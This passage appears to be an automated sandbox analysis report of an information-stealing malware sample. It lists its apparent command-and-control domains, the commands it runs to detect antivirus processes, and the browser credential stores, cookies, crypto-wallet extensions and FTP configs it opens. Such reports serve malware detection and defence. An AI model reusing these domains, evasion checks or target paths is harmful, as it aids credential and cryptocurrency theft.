                  barindex
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: leeryspcieu.click
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENTJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeQueries volume information: C:\Users\user\AppData\Local\Temp\d5f90697 VolumeInformation
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_00B1DA50 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B1DA50
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3872774190.0000000000DB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: qnUFsmyxMm.exe PID: 6464, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.qnUFsmyxMm.exe.790000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.3979712058.00000000006F2000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]x
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
